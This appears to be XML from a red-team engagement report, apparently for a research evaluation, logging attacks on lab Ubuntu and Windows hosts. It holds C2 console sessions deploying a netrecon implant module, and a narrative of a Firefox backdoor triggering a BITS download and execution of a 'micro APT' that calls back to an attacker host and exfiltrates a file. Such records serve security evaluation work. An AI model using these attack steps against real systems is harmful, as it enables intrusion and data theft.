          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.78</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Ubuntu 14.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37499D4D" w14:textId="2168C9E7" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_u4e2jjbq3ovo" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="64" w:name="_Toc12600029"/>
      <w:bookmarkEnd w:id="63"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="1E24688B"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Firefox 54.0.1 backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CB609A"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Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1645F86C"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Netrecon module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1558001C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Failed to run, error in deploying module (lost connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F9BD71" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="00C83177">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc12600030"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="58E54B4D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F86AC1A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/projects/drakon-apt/oc2$ sudo python ocMain.py --http 8102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C854733" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[sudo] password for kududyn: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40093CC7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Must install flask to use snuggly, ignoring...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6D828C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>projects/build_drakon.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D36100C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Default interface: 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E127860" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Listening for connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A0B072" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            0.0.0.0:8102  [HTTP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309E00BF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388F78A1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="731378C6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0D3E4A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [linux] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101B6830" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[*] Initializing new linux console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0678C1F9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [L1] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B61A56" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="221D4DE1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59417526" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F38066D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L1        128.55.12.167:56668 --&gt;   128.55.12.167:8102  [HTTP]  Thu May  9 14:35:07 2019        active 26s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635B5258" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con L1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4172F680" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="726761FE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032730C8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11872487" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta52-ubuntu-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0891078C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDB2854" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uid: 1003 admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A6E745" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36032A38" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32776C67" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;module netrecon /e5/deploy/netrecon.linux.x64.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A867EE4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BEB1A5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +----------+----------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B1BEFD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] |   name   | library                          | deployed |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F8C4A8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +----------+----------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9D2537" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] | netrecon | /e5/deploy/netrecon.linux.x64.so |    0     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A9940F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +----------+----------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A1DE91" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;deploy netrecon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E40F5C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Loading module /e5/deploy/netrecon.linux.x64.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682DF61D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] deploy success [netrecon] [/e5/deploy/netrecon.linux.x64.so]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4647B17E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47710B62" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CE9BEC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F408719" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +----------+----------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798BA62A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] |   name   | library                          | deployed |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D72A286" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +----------+----------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D1E5E4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] | netrecon | /e5/deploy/netrecon.linux.x64.so |    1     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6D355E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +----------+----------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A5334F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30AE4793" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FC9F21" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;getpid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E718ED3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[No response]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65812CAF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="279C357B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4661A4C2" w14:textId="4211B3F1" w:rsidR="00A351B2" w:rsidRPr="00965965" w:rsidRDefault="006C14C7" w:rsidP="00965965">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>[-] Connection lost for console [L1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D44B5F" w14:textId="2A10817F" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc12600031"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>15:34 -- TA5.2 Windows 2 -- Firefox BITS Micro APT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="7C3DB1A0" w14:textId="0A1BC202" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00CE2C66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The last attack of the day was against the TA5.2 Windows host using a new capability, Firefox BITS micro APT.  The scenario for this simulacrum was to take advantage of the exploited Firefox backdoor by browsing to http://128.55.12.167:8002/config.html.  This initiated a download from Firefox via the BITS protocol.  BITS download and executed micro APT, which connected out to 128.55.12.167:80 for C2.  Once again driver signing appeared to be enabled, and micro APT failed to use the elevate driver.  The attacker then exfil’ed the host file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670FB265" w14:textId="598F2604" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc12600032"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="603BB6CA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta52-windows-2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.77</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Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE04503" w14:textId="19FC1DBC" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_v8g332behdns" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="69" w:name="_Toc12600033"/>
      <w:bookmarkEnd w:id="68"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="4FC477EE"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Firefox 54.0.1 backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F39B868"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BITS protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24644A8B"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Micro APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368C8B64" w14:textId="501DE970" w:rsidR="00A351B2"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Elevate driver (sysmon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B931F4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc12600034"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="28BE28F2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22359472" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Browse to 128.55.12.167:8001/config.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8CACA8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>http://128.55.12.167:8001/ctfhost2.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC8A1AB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AEEE1AF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5954B1C4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>http://128.55.12.167:8002/ctfhost2.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21349913" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Visit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E144D1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5219FABD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B50564" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>C:\Users\admin\AppData\Local\Temp\ctfhost2.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409CBA46" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A2ED50" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207706C2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kududyn-ProLiant-SL170s-G6:/e5/backup/20190506/projects/micro-apt# ./c2.py 80                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114AFB26" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">waiting for connection on port 80                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04919CE7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">waiting for micro apt (ctrl+c to break from loop)                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613CF0F4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">connection from (send quit to disconnect micro-apt) ('127.0.0.1', 43054)                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F4B2D4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x00\x00\x00\x00' (8 bytes)                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7D6853" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 00 00 00 00         </w:t>
      </w:r>
    </w:p>
